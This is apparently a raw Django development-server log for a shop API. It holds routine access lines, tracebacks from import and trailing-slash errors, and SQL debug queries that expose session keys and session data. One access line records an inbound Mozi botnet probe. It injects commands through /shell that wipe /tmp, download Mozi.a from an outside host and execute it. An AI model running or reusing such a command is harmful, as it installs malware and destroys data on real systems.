00:10:06] "GET / HTTP/1.0" 302 0 [12/Dec/2019 00:15:08] "GET / HTTP/1.0" 302 0 [12/Dec/2019 00:20:12] "GET / HTTP/1.0" 302 0 [12/Dec/2019 00:25:14] "GET / HTTP/1.0" 302 0 [12/Dec/2019 00:30:17] "GET / HTTP/1.0" 302 0 [12/Dec/2019 00:35:38] "GET / HTTP/1.0" 302 0 [12/Dec/2019 00:40:59] "GET / HTTP/1.0" 302 0 [12/Dec/2019 00:46:02] "GET / HTTP/1.0" 302 0 [12/Dec/2019 00:51:04] "GET / HTTP/1.0" 302 0 [12/Dec/2019 00:56:07] "GET / HTTP/1.0" 302 0 [12/Dec/2019 01:05:02] "GET / HTTP/1.0" 302 0 [12/Dec/2019 01:10:05] "GET / HTTP/1.0" 302 0 [12/Dec/2019 01:15:08] "GET / HTTP/1.0" 302 0 [12/Dec/2019 01:20:48] "GET / HTTP/1.0" 302 0 [12/Dec/2019 01:24:58] "GET / HTTP/1.0" 302 0 [12/Dec/2019 01:30:01] "GET / HTTP/1.0" 302 0 [12/Dec/2019 01:30:01] "GET /whm-server-status HTTP/1.0" 301 0 [12/Dec/2019 01:35:04] "GET / HTTP/1.0" 302 0 [12/Dec/2019 01:40:07] "GET / HTTP/1.0" 302 0 [12/Dec/2019 01:45:10] "GET / HTTP/1.0" 302 0 [12/Dec/2019 01:54:42] "GET / HTTP/1.0" 302 0 [12/Dec/2019 01:59:45] "GET / HTTP/1.0" 302 0 [12/Dec/2019 02:05:03] "GET / HTTP/1.0" 302 0 [12/Dec/2019 02:10:06] "GET / HTTP/1.0" 302 0 [12/Dec/2019 02:16:50] "GET / HTTP/1.0" 302 0 [12/Dec/2019 02:22:37] "GET / HTTP/1.0" 302 0 [12/Dec/2019 02:28:37] "GET / HTTP/1.0" 302 0 [12/Dec/2019 02:37:07] "GET / HTTP/1.0" 302 0 [12/Dec/2019 02:40:17] "GET / HTTP/1.0" 302 0 [12/Dec/2019 02:42:15] "GET / HTTP/1.0" 302 0 [12/Dec/2019 02:47:18] "GET / HTTP/1.0" 302 0 [12/Dec/2019 02:51:08] "GET / HTTP/1.0" 302 0 [12/Dec/2019 02:53:31] "GET / HTTP/1.0" 302 0 [12/Dec/2019 02:58:34] "GET / HTTP/1.0" 302 0 [12/Dec/2019 03:05:03] "GET / HTTP/1.0" 302 0 [12/Dec/2019 03:10:06] "GET / HTTP/1.0" 302 0 [12/Dec/2019 03:11:05] "GET / HTTP/1.0" 302 0 [12/Dec/2019 03:15:08] "GET / HTTP/1.0" 302 0 [12/Dec/2019 03:24:17] "GET / HTTP/1.0" 302 0 [12/Dec/2019 03:31:53] "GET / HTTP/1.0" 302 0 [12/Dec/2019 03:37:36] "GET / HTTP/1.0" 302 0 [12/Dec/2019 03:44:45] "GET / HTTP/1.0" 302 0 [12/Dec/2019 03:54:15] "GET / HTTP/1.0" 302 0 [12/Dec/2019 03:59:18] "GET / HTTP/1.0" 302 0 [12/Dec/2019 04:05:03] "GET / HTTP/1.0" 302 0 [12/Dec/2019 04:05:06] "GET / HTTP/1.0" 302 0 [12/Dec/2019 04:06:06] "GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.0" 301 0 [12/Dec/2019 04:10:05] "GET / HTTP/1.0" 302 0 [12/Dec/2019 04:15:08] "GET / HTTP/1.0" 302 0 [12/Dec/2019 04:20:11] "GET / HTTP/1.0" 302 0 [12/Dec/2019 04:25:14] "GET / HTTP/1.0" 302 0 [12/Dec/2019 04:30:18] "GET / HTTP/1.0" 302 0 [12/Dec/2019 04:39:13] "GET / HTTP/1.0" 302 0 [12/Dec/2019 04:44:15] "GET / HTTP/1.0" 302 0 [12/Dec/2019 04:49:34] "GET / HTTP/1.0" 302 0 [12/Dec/2019 04:50:33] "GET / HTTP/1.0" 302 0 [12/Dec/2019 04:54:36] "GET / HTTP/1.0" 302 0 [12/Dec/2019 04:59:39] "GET / HTTP/1.0" 302 0 [12/Dec/2019 05:05:03] "GET / HTTP/1.0" 302 0 [12/Dec/2019 05:10:05] "GET / HTTP/1.0" 302 0 [12/Dec/2019 05:15:08] "GET / HTTP/1.0" 302 0 [12/Dec/2019 05:20:11] "GET / HTTP/1.0" 302 0 [12/Dec/2019 05:25:14] "GET / HTTP/1.0" 302 0 [12/Dec/2019 05:30:17] "GET / HTTP/1.0" 302 0 [12/Dec/2019 05:35:02] "GET /whm-server-status HTTP/1.0" 301 0 [12/Dec/2019 05:36:54] "GET / HTTP/1.0" 302 0 [12/Dec/2019 05:41:57] "GET / HTTP/1.0" 302 0 [12/Dec/2019 05:47:00] "GET / HTTP/1.0" 302 0 [12/Dec/2019 05:52:02] "GET / HTTP/1.0" 302 0 [12/Dec/2019 05:57:05] "GET / HTTP/1.0" 302 0 [12/Dec/2019 06:05:02] "GET / HTTP/1.0" 302 0 [12/Dec/2019 06:10:05] "GET / HTTP/1.0" 302 0 Internal Server Error: /editBlackAndWhiteList Traceback (most recent call last): File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/core/handlers/exception.py", line 34, in inner response = get_response(request) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/utils/deprecation.py", line 93, in __call__ response = self.process_request(request) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/middleware/common.py", line 53, in process_request path = self.get_full_path_with_slash(request) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/middleware/common.py", line 93, in get_full_path_with_slash 'url': request.get_host() + new_path, RuntimeError: You called this URL via POST, but the URL doesn't end in a slash and you have APPEND_SLASH set. Django can't redirect to the slash URL while maintaining POST data. Change your form to point to 70.32.81.181/editBlackAndWhiteList/ (note the trailing slash), or set APPEND_SLASH=False in your Django settings. [12/Dec/2019 06:11:41] "POST /editBlackAndWhiteList HTTP/1.0" 500 63818 [12/Dec/2019 06:17:35] "GET / HTTP/1.0" 302 0 /home/resfx/public_html/admin.resfx.com/backend/shopapi/views.py changed, reloading. Performing system checks... December 11, 2019 - 10:36:19 Django version 2.2.7, using settings 'django_shop_tutorial.settings' Starting development server at http://127.0.0.1:8000/ Quit the server with CONTROL-C. Watching for file changes with StatReloader Exception in thread django-main-thread: Traceback (most recent call last): File "/usr/local/lib/python3.6/threading.py", line 916, in _bootstrap_inner self.run() File "/usr/local/lib/python3.6/threading.py", line 864, in run self._target(*self._args, **self._kwargs) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/utils/autoreload.py", line 54, in wrapper fn(*args, **kwargs) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/core/management/commands/runserver.py", line 117, in inner_run self.check(display_num_errors=True) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/core/management/base.py", line 390, in check include_deployment_checks=include_deployment_checks, File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/core/management/base.py", line 377, in _run_checks return checks.run_checks(**kwargs) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/core/checks/registry.py", line 72, in run_checks new_errors = check(app_configs=app_configs) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/core/checks/urls.py", line 13, in check_url_config return check_resolver(resolver) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/core/checks/urls.py", line 23, in check_resolver return check_method() File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/urls/resolvers.py", line 399, in check for pattern in self.url_patterns: File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/utils/functional.py", line 80, in __get__ res = instance.__dict__[self.name] = self.func(instance) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/urls/resolvers.py", line 584, in url_patterns patterns = getattr(self.urlconf_module, "urlpatterns", self.urlconf_module) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/utils/functional.py", line 80, in __get__ res = instance.__dict__[self.name] = self.func(instance) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/urls/resolvers.py", line 577, in urlconf_module return import_module(self.urlconf_name) File "/usr/local/lib/python3.6/importlib/__init__.py", line 126, in import_module return _bootstrap._gcd_import(name[level:], package, level) File "", line 994, in _gcd_import File "", line 971, in _find_and_load File "", line 955, in _find_and_load_unlocked File "", line 665, in _load_unlocked File "", line 678, in exec_module File "", line 219, in _call_with_frames_removed File "/home/resfx/public_html/admin.resfx.com/backend/django_shop_tutorial/urls.py", line 31, in url(r'^api/v1/', include(('shopapi.urls', 'shopapi'), namespace='shopapi')), File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/urls/conf.py", line 34, in include urlconf_module = import_module(urlconf_module) File "/usr/local/lib/python3.6/importlib/__init__.py", line 126, in import_module return _bootstrap._gcd_import(name[level:], package, level) File "", line 994, in _gcd_import File "", line 971, in _find_and_load File "", line 955, in _find_and_load_unlocked File "", line 665, in _load_unlocked File "", line 678, in exec_module File "", line 219, in _call_with_frames_removed File "/home/resfx/public_html/admin.resfx.com/backend/shopapi/urls.py", line 3, in from shopapi.views import CategoryView, CategoryDetailView, ProductView, ProductDetailView File "/home/resfx/public_html/admin.resfx.com/backend/shopapi/views.py", line 3, in from shopapi.serializers import CategorySerializer, ProductSerializer ImportError: cannot import name 'CategorySerializer' /home/resfx/public_html/admin.resfx.com/backend/shopapi/views.py changed, reloading. Performing system checks... Watching for file changes with StatReloader Exception in thread django-main-thread: Traceback (most recent call last): File "/usr/local/lib/python3.6/threading.py", line 916, in _bootstrap_inner self.run() File "/usr/local/lib/python3.6/threading.py", line 864, in run self._target(*self._args, **self._kwargs) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/utils/autoreload.py", line 54, in wrapper fn(*args, **kwargs) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/core/management/commands/runserver.py", line 117, in inner_run self.check(display_num_errors=True) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/core/management/base.py", line 390, in check include_deployment_checks=include_deployment_checks, File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/core/management/base.py", line 377, in _run_checks return checks.run_checks(**kwargs) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/core/checks/registry.py", line 72, in run_checks new_errors = check(app_configs=app_configs) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/core/checks/urls.py", line 13, in check_url_config return check_resolver(resolver) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/core/checks/urls.py", line 23, in check_resolver return check_method() File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/urls/resolvers.py", line 399, in check for pattern in self.url_patterns: File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/utils/functional.py", line 80, in __get__ res = instance.__dict__[self.name] = self.func(instance) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/urls/resolvers.py", line 584, in url_patterns patterns = getattr(self.urlconf_module, "urlpatterns", self.urlconf_module) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/utils/functional.py", line 80, in __get__ res = instance.__dict__[self.name] = self.func(instance) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/urls/resolvers.py", line 577, in urlconf_module return import_module(self.urlconf_name) File "/usr/local/lib/python3.6/importlib/__init__.py", line 126, in import_module return _bootstrap._gcd_import(name[level:], package, level) File "", line 994, in _gcd_import File "", line 971, in _find_and_load File "", line 955, in _find_and_load_unlocked File "", line 665, in _load_unlocked File "", line 678, in exec_module File "", line 219, in _call_with_frames_removed File "/home/resfx/public_html/admin.resfx.com/backend/django_shop_tutorial/urls.py", line 31, in url(r'^api/v1/', include(('shopapi.urls', 'shopapi'), namespace='shopapi')), File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/urls/conf.py", line 34, in include urlconf_module = import_module(urlconf_module) File "/usr/local/lib/python3.6/importlib/__init__.py", line 126, in import_module return _bootstrap._gcd_import(name[level:], package, level) File "", line 994, in _gcd_import File "", line 971, in _find_and_load File "", line 955, in _find_and_load_unlocked File "", line 665, in _load_unlocked File "", line 678, in exec_module File "", line 219, in _call_with_frames_removed File "/home/resfx/public_html/admin.resfx.com/backend/shopapi/urls.py", line 10, in url(r'^(?P[-\w]+)/$', SameCategoryProductsView.as_view(), name='pdct_list_by_category') NameError: name 'SameCategoryProductsView' is not defined /home/resfx/public_html/admin.resfx.com/backend/shopapi/urls.py changed, reloading. Performing system checks... Watching for file changes with StatReloader System check identified some issues: WARNINGS: ?: (urls.W005) URL namespace 'admin' isn't unique. You may not be able to reverse all URLs in this namespace ?: (urls.W005) URL namespace 'rest_framework' isn't unique. You may not be able to reverse all URLs in this namespace System check identified 2 issues (0 silenced). DEBUG 2019-12-12 06:26:55,211 utils 11259 139831586211584 (0.006) SELECT c.relname, CASE WHEN c.relispartition THEN 'p' WHEN c.relkind IN ('m', 'v') THEN 'v' ELSE 't' END FROM pg_catalog.pg_class c LEFT JOIN pg_catalog.pg_namespace n ON n.oid = c.relnamespace WHERE c.relkind IN ('f', 'm', 'p', 'r', 'v') AND n.nspname NOT IN ('pg_catalog', 'pg_toast') AND pg_catalog.pg_table_is_visible(c.oid) ; args=None DEBUG 2019-12-12 06:26:55,216 utils 11259 139831586211584 (0.001) SELECT "django_migrations"."app", "django_migrations"."name" FROM "django_migrations"; args=() DEBUG 2019-12-12 06:27:07,090 utils 11259 139831552767744 (0.005) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."slug" = 'fire'; args=('fire',) DEBUG 2019-12-12 06:27:07,098 utils 11259 139831552767744 (0.003) SELECT "shop_product"."id", "shop_product"."category_id", "shop_product"."name", "shop_product"."slug", "shop_product"."image", "shop_product"."video", "shop_product"."description", "shop_product"."price", "shop_product"."stock", "shop_product"."available", "shop_product"."created", "shop_product"."updated" FROM "shop_product" WHERE ("shop_product"."available" = true AND "shop_product"."category_id" = 1) ORDER BY "shop_product"."name" ASC; args=(True, 1) DEBUG 2019-12-12 06:27:07,136 utils 11259 139831552767744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."slug" = 'fire'; args=('fire',) DEBUG 2019-12-12 06:27:07,145 utils 11259 139831552767744 (0.002) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-12T06:27:07.142121+00:00'::timestamptz AND "django_session"."session_key" = 'g6b5kylaf4glm3mfb70u6becl9zozzh3'); args=(datetime.datetime(2019, 12, 12, 6, 27, 7, 142121, tzinfo=), 'g6b5kylaf4glm3mfb70u6becl9zozzh3') DEBUG 2019-12-12 06:27:07,204 utils 11259 139831552767744 (0.001) UPDATE "django_session" SET "session_data" = 'YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', "expire_date" = '2019-12-26T06:27:07.202433+00:00'::timestamptz WHERE "django_session"."session_key" = 'g6b5kylaf4glm3mfb70u6becl9zozzh3'; args=('YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', datetime.datetime(2019, 12, 26, 6, 27, 7, 202433, tzinfo=), 'g6b5kylaf4glm3mfb70u6becl9zozzh3') [12/Dec/2019 06:27:07] "GET /api/v1/fire/ HTTP/1.0" 200 6618 [12/Dec/2019 06:27:07] "GET /static/rest_framework/css/default.css HTTP/1.0" 200 1131 [12/Dec/2019 06:27:07] "GET /static/rest_framework/css/prettify.css HTTP/1.0" 200 817 [12/Dec/2019 06:27:07] "GET /static/rest_framework/css/bootstrap-tweaks.css HTTP/1.0" 200 3385 [12/Dec/2019 06:27:07] "GET /static/rest_framework/css/bootstrap.min.css HTTP/1.0" 200 121457 [12/Dec/2019 06:27:07] "GET /static/rest_framework/js/ajax-form.js HTTP/1.0" 200 3597 [12/Dec/2019 06:27:07] "GET /static/rest_framework/js/jquery-3.4.1.min.js HTTP/1.0" 200 88145 [12/Dec/2019 06:27:07] "GET /static/rest_framework/js/csrf.js HTTP/1.0" 200 1719 [12/Dec/2019 06:27:08] "GET /static/rest_framework/js/default.js HTTP/1.0" 200 1268 [12/Dec/2019 06:27:08] "GET /static/rest_framework/js/bootstrap.min.js HTTP/1.0" 200 37608 [12/Dec/2019 06:27:08] "GET /static/rest_framework/js/prettify-min.js HTTP/1.0" 200 13632 [12/Dec/2019 06:27:08] "GET /static/rest_framework/img/grid.png HTTP/1.0" 200 1458 DEBUG 2019-12-12 06:28:01,170 utils 11259 139831538779904 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."slug" = 'fire'; args=('fire',) DEBUG 2019-12-12 06:28:01,175 utils 11259 139831538779904 (0.002) SELECT "shop_product"."id", "shop_product"."category_id", "shop_product"."name", "shop_product"."slug", "shop_product"."image", "shop_product"."video", "shop_product"."description", "shop_product"."price", "shop_product"."stock", "shop_product"."available", "shop_product"."created", "shop_product"."updated" FROM "shop_product" WHERE ("shop_product"."available" = true AND "shop_product"."category_id" = 1) ORDER BY "shop_product"."name" ASC; args=(True, 1) DEBUG 2019-12-12 06:28:01,185 utils 11259 139831538779904 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."slug" = 'fire'; args=('fire',) DEBUG 2019-12-12 06:28:01,216 utils 11259 139831538779904 (0.002) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'j74q3e00wlqdrywj7k90zzxgu21onqo5' LIMIT 1; args=('j74q3e00wlqdrywj7k90zzxgu21onqo5',) DEBUG 2019-12-12 06:28:01,218 utils 11259 139831538779904 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('j74q3e00wlqdrywj7k90zzxgu21onqo5', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2019-12-26T06:28:01.217215+00:00'::timestamptz); args=('j74q3e00wlqdrywj7k90zzxgu21onqo5', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2019, 12, 26, 6, 28, 1, 217215, tzinfo=)) [12/Dec/2019 06:28:01] "GET /api/v1/fire/ HTTP/1.0" 200 6618 [12/Dec/2019 06:31:36] "GET / HTTP/1.0" 302 0 [12/Dec/2019 06:32:15] "GET / HTTP/1.0" 302 0 [12/Dec/2019 06:37:18] "GET / HTTP/1.0" 302 0 [12/Dec/2019 06:42:21] "GET / HTTP/1.0" 302 0 [12/Dec/2019 06:47:24] "GET / HTTP/1.0" 302 0 [12/Dec/2019 06:52:27] "GET / HTTP/1.0" 302 0 [12/Dec/2019 06:57:30] "GET / HTTP/1.0" 302 0 [12/Dec/2019 07:05:03] "GET / HTTP/1.0" 302 0 [12/Dec/2019 07:10:06] "GET / HTTP/1.0" 302 0 [12/Dec/2019 07:15:08] "GET / HTTP/1.0" 302 0 [12/Dec/2019 07:20:11] "GET / HTTP/1.0" 302 0 [12/Dec/2019 07:25:14] "GET / HTTP/1.0" 302 0 [12/Dec/2019 07:30:17] "GET / HTTP/1.0" 302 0 [12/Dec/2019 07:35:20] "GET / HTTP/1.0" 302 0 [12/Dec/2019 07:40:22] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-12 07:40:56,723 utils 11259 139831538779904 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-12 07:40:56,733 utils 11259 139831538779904 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-12 07:40:56,737 utils 11259 139831538779904 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-12 07:40:56,742 utils 11259 139831538779904 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-12 07:40:56,746 utils 11259 139831538779904 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-12 07:40:56,750 utils 11259 139831538779904 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-12 07:40:56,753 utils 11259 139831538779904 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-12 07:40:56,757 utils 11259 139831538779904 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-12 07:40:56,761 utils 11259 139831538779904 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-12 07:40:56,765 utils 11259 139831538779904 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-12 07:40:56,769 utils 11259 139831538779904 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) [12/Dec/2019 07:40:56] "GET /api/v1/categories/ HTTP/1.0" 200 1769 DEBUG 2019-12-12 07:40:59,895 utils 11259 139831538779904 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-12 07:40:59,903 utils 11259 139831538779904 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-12 07:40:59,907 utils 11259 139831538779904 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-12 07:40:59,911 utils 11259 139831538779904 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-12 07:40:59,916 utils 11259 139831538779904 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-12 07:40:59,921 utils 11259 139831538779904 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-12 07:40:59,925 utils 11259 139831538779904 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-12 07:40:59,929 utils 11259 139831538779904 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", 